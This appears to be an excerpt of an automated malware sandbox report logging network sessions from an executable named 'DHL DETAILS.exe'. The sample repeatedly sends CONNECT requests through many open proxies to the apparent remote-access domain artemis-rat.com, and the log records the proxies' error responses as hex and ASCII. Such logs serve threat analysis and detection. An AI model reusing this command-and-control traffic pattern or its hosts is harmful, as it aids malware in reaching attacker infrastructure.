Mar 9, 2024 13:14:14.259669065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
507	192.168.2.5	51586	172.67.209.12	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.260004997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.414155006 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
508	192.168.2.5	51546	118.218.126.54	9400	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.260303020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.575565100 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Zscaler/6.2 Cache-Control: no-cache Access-Control-Allow-Origin: * Content-length: 13597 Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 68 65 69 67 68 Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscloud.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;heigh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
509	192.168.2.5	51533	103.23.100.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.260947943 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
510	192.168.2.5	50106	64.227.108.25	31908	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.261126041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.270781040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
511	192.168.2.5	51542	120.76.42.209	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.266668081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.606056929 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
512	192.168.2.5	51515	139.59.1.14	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.267961025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.067322969 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
513	192.168.2.5	51567	45.43.81.164	5811	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.277324915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.646862030 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
514	192.168.2.5	51535	93.90.212.2	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.280941963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
515	192.168.2.5	51569	203.74.125.18	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.289791107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.821240902 CET	59	IN	HTTP/1.1 200 Connection Established Proxy-agent: nginx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
516	192.168.2.5	51289	184.170.249.65	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.305686951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
517	192.168.2.5	51622	104.19.120.84	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.325807095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.480142117 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
518	192.168.2.5	50906	98.162.25.7	31653	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.340245008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
519	192.168.2.5	50872	163.172.165.36	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.345952034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.380094051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.227385998 CET	536	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
520	192.168.2.5	51576	203.218.172.225	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.377841949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
521	192.168.2.5	51574	82.157.194.44	7890	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.383095980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.708420992 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
522	192.168.2.5	51145	162.240.231.211	60589	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.393439054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.536390066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.724061012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
523	192.168.2.5	50736	122.114.232.137	808	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.401370049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
524	192.168.2.5	51032	184.178.172.5	15303	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.401515007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
525	192.168.2.5	51027	98.170.57.249	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.401644945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
526	192.168.2.5	51015	72.210.252.137	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.403589010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
527	192.168.2.5	51656	172.67.182.77	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.407617092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
